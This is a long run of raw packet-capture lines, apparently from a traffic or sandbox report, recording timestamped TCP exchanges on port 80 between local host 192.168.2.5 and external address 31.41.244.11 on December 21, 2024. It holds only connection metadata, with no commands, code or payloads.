                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.332155943 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.332302094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.332341909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.333257914 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.333307981 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.333406925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.333463907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.334491014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.334553003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.334573984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.334619999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.335592985 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.335652113 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.335690975 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.335728884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.336882114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.336898088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.336934090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.336961031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.338052034 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.338068008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.338088989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.338135958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.339205980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.339222908 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.339247942 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.339278936 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.340373039 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.340389013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.340439081 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.341519117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.341536045 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.341604948 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.342762947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.342787027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.342816114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.342855930 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.343806028 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.343822956 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.343862057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.343895912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.344907999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.344969034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.345041037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.345089912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.346164942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.346211910 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.346235037 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.346265078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.347265005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.347335100 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.347367048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.347410917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.348432064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.348479033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.348588943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.348628998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.349575996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.349626064 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.349674940 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.349714994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.350718975 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.350754976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.350848913 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.350893974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.351898909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.351944923 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.352037907 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.352080107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.353065014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.353106022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.353158951 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.353203058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522145987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522198915 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522313118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522313118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522645950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522701979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522815943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.522866011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.523565054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.523612022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.523673058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.523719072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.524738073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.524785042 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.524827003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.524869919 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.525866985 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.525918007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.526006937 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.526053905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.527031898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.527081013 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.527138948 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.527184963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.528317928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.528333902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.528394938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.528394938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.529386044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.529432058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.529547930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.529608965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.530524969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.530570984 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.530630112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.530674934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.531725883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.531770945 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.531821012 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.531866074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.532897949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.532941103 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.532999992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.533041954 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.534082890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.534128904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.534128904 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.534181118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.535207033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.535253048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.535350084 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.535396099 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.536393881 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.536416054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.536434889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.536463022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.537565947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.537612915 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.537664890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.537708044 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.538701057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.538748980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.538800001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.538841009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.539879084 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.539921999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.539942980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.539984941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.541033983 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.541076899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.541136980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.541192055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.542188883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.542243004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.542300940 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.542351961 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.543354988 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.543405056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.543519020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.543560982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.544550896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.544594049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.544661999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.544703960 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.545732021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.545774937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.545854092 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.545897961 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.546894073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.546943903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.547015905 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.547058105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.547986031 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.548028946 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.548113108 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.548156977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.549160004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.549204111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.549271107 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.549313068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.550409079 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.550458908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.550501108 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.550542116 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.551562071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.551611900 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.551693916 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.551733971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.552763939 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.552783966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.552809954 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.552845001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.554038048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.554055929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.554088116 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.554117918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.555098057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.555114985 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.555141926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.555172920 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.556298971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.556315899 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.556345940 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.556375027 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.557446003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.557462931 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.557495117 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.557523012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.558573961 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.558590889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.558618069 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.558648109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.559755087 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.559772968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.559798956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.559819937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.560916901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.560933113 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.560962915 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.560985088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.561960936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.562006950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.562026024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.562061071 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.563184023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.563246965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.563299894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.563358068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.564346075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.564388037 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.564435959 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.564483881 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.565565109 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.565614939 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.565622091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.565665007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.566665888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.566710949 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.566749096 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.566790104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.567842007 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.567903042 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.567946911 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.567995071 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.568972111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.569020033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.569070101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.569112062 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.570126057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.570168972 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.570235968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.570281029 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.571382046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.571428061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.571566105 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.571611881 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.572647095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.572663069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.572695971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.572726011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.573699951 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.573735952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.573755026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.573790073 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.574867010 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.574908972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.574918985 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.574953079 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.576005936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.576055050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.576059103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.576100111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.577143908 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.577189922 CET4982880192.168.2.531.41.244.11
